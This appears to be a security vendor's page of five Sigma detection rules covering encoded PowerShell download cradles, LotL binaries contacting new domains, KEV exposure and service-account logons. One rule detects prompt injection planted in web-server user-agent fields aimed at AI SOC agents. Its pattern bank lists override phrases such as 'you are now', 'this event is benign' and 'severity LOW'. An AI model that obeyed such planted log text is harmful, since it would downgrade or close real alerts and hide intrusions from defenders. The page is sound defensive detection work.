A small, opinionated set of detection rules we use ourselves. Baseline-aware where it matters, parent-process-conscious, and written for environments that already have too many rules. Copy what's useful. Skip what isn't.
Catches the classic powershell -enc <base64> download cradle, but suppresses common legitimate parents
(your RMM, your patch management agent — edit the filter_known block for your environment) instead of suppressing
the cradle itself. In our benchmark across three environments, this cut FP rate by roughly 80% versus the standard rule.
title: Suspicious PowerShell encoded download cradle (parent-aware)
id: 7c2a1d44-3e5b-4b29-9b88-2f1a0a4e9b41
status: experimental
description: |
Detects PowerShell launches with -EncodedCommand that perform an outbound download.
Suppresses known-legitimate parents to lower FP rate dramatically.
references:
- https://syberops.com/signal/2026-04-24-living-off-the-land-revival.html
author: SyberOps
date: 2026/04/18
tags:
- attack.execution
- attack.t1059.001
- attack.command_and_control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
selection_powershell:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains|all:
- '-en'
- 'http'
selection_keywords:
CommandLine|contains:
- 'IEX'
- 'Invoke-Expression'
- 'DownloadString'
- 'WebClient'
- 'Invoke-WebRequest'
- 'Net.WebRequest'
filter_known_parents:
# EDIT FOR YOUR ENVIRONMENT — these are common false-positive parents.
# Verify each is *actually* trusted in your shop before trusting them here.
ParentImage|endswith:
- '\ConfigurationManager\bin\x64\smsexec.exe'
- '\WindowsAzure\GuestAgent\WaAppAgent.exe'
condition: selection_powershell and selection_keywords and not filter_known_parents
falsepositives:
- Legitimate scripted RMM workflows (add to filter_known_parents per environment)
- Software installers that download payloads via PowerShell
level: high
The "ship-this-today" rule referenced in our LotL Signal post.
Joins a process-creation event with a network-connection event from the same PID, and filters on a domain-age enrichment field
(most threat-intel feeds expose domain_age_days for free).
title: LotL binary outbound to recently-registered domain
id: 1f8b3c7e-4a92-4c18-bd1d-7e3a8f0c2d69
status: experimental
description: |
Fires when a known LotL binary makes an outbound HTTPS connection to a domain
whose age is less than 30 days. Pair with your DNS provider's domain-age enrichment.
references:
- https://syberops.com/signal/2026-04-24-living-off-the-land-revival.html
author: SyberOps
date: 2026/04/19
tags:
- attack.command_and_control
- attack.t1105
- attack.defense_evasion
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith:
- '\certutil.exe'
- '\bitsadmin.exe'
- '\mshta.exe'
- '\regsvr32.exe'
DestinationPort: 443
Initiated: 'true'
enrichment:
# Requires DNS/TI enrichment of dst_domain_age_days at ingest time.
dst_domain_age_days|lte: 30
condition: selection and enrichment
falsepositives:
- Newly-launched legitimate SaaS domains in the first 30 days post-registration
level: high
A first-pass detector for the prompt-injection-via-log pattern from Signal #001. This is not a substitute for structural isolation — it's a tripwire for cases where the structural defense gets misconfigured. Tune the keyword list against your real traffic; expect FPs on legitimate prompt-engineering content (developer logs, AI safety researcher traffic, etc).
title: Possible prompt-injection content in log field
id: a3d0e6c1-58b4-4f7a-92c9-4b1d3e9c0a7f
status: experimental
description: |
Heuristic match for prompt-injection-style content showing up in user-controllable
log fields. Use as a tripwire, not as your primary defense — see the Research essay
for why structural isolation is the real fix.
references:
- https://syberops.com/research/prompt-injection-soc-agents.html
- https://syberops.com/signal/2026-04-25-prompt-injection-soc-agents.html
author: SyberOps
date: 2026/04/22
tags:
- attack.initial_access
- attack.t1190
logsource:
product: webserver
category: webserver
detection:
selection:
cs_user_agent|contains|all|i:
- 'ignore'
- 'instruction'
selection_phrases:
# Pattern bank — tune to your traffic.
cs_user_agent|contains|i:
- 'auto-close'
- 'severity LOW'
- 'this event is benign'
- 'you are now'
- 'system prompt'
- 'pretend you are'
condition: selection or selection_phrases
falsepositives:
- Developer or researcher traffic containing legitimate AI prompts
- Internal red-team exercises
level: medium
Posture rule, not a behavior rule. Joins your CMDB / asset inventory against the live CISA KEV feed and fires when a
KEV-listed CVE is observed on a host marked internet_facing: true. Pair with the
re-prioritization triage agent to avoid drowning in low-priority KEVs.
title: CISA KEV CVE present on internet-facing asset
id: e5b1ac7c-92db-4bda-9c8e-2f0a3d70a4b1
status: experimental
description: |
Correlates vulnerability scanner findings with CMDB exposure data and the live
CISA KEV catalog. Fires only when (CVE in KEV) AND (asset.internet_facing == true).
references:
- https://syberops.com/signal/2026-04-23-cisa-kev-batch-analysis.html
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
author: SyberOps
date: 2026/04/22
tags:
- cve.kev
- exposure
logsource:
product: vuln_scanner
detection:
selection:
cve_id|exists: true
asset.internet_facing: true
enrichment:
cve_id|in_list: 'cisa_kev_cve_ids' # populate via daily KEV feed sync
condition: selection and enrichment
falsepositives:
- Compensating controls present (WAF, IPS sig) — exclude per asset
level: high
Service accounts (svc_*, $-suffixed, app-managed identities) should authenticate via Kerberos service
tickets, not interactive logons. An interactive logon by a service account is almost always either misconfiguration or
compromise. This is one of those rules with a low alert volume and a high precision — keep it on.
title: Interactive logon by service account
id: 0c8a6b22-5d31-4f88-aef2-9b1c2e8a14d7
status: stable
description: |
Detects logon types 2, 7, 10, or 11 (interactive / unlock / RDP / cached interactive)
by an account whose name matches the environment's service-account naming pattern.
author: SyberOps
date: 2026/04/15
tags:
- attack.credential_access
- attack.lateral_movement
- attack.t1078
logsource:
product: windows
service: security
detection:
selection:
EventID:
- 4624
LogonType:
- 2
- 7
- 10
- 11
selection_account:
# EDIT to match your environment's service account naming convention.
TargetUserName|startswith:
- 'svc_'
- 'svc-'
TargetUserName|endswith:
- '$'
condition: selection and selection_account
falsepositives:
- Approved break-glass interactive use of a service account (should be rare and audited)
level: high
All rules on this page are MIT-licensed. Take them, modify them, ship them — no attribution required, though we'd love a pull request if you improve one. We're maintaining a small set we run ourselves rather than a huge unmaintained library. If a rule fires badly in your environment, that's a signal we want, not noise we want to ignore — drop us a line.
Want the agent to triage one of your alerts? Paste it into demo.syberops.com and watch the reasoning, severity call, and MITRE mapping stream live.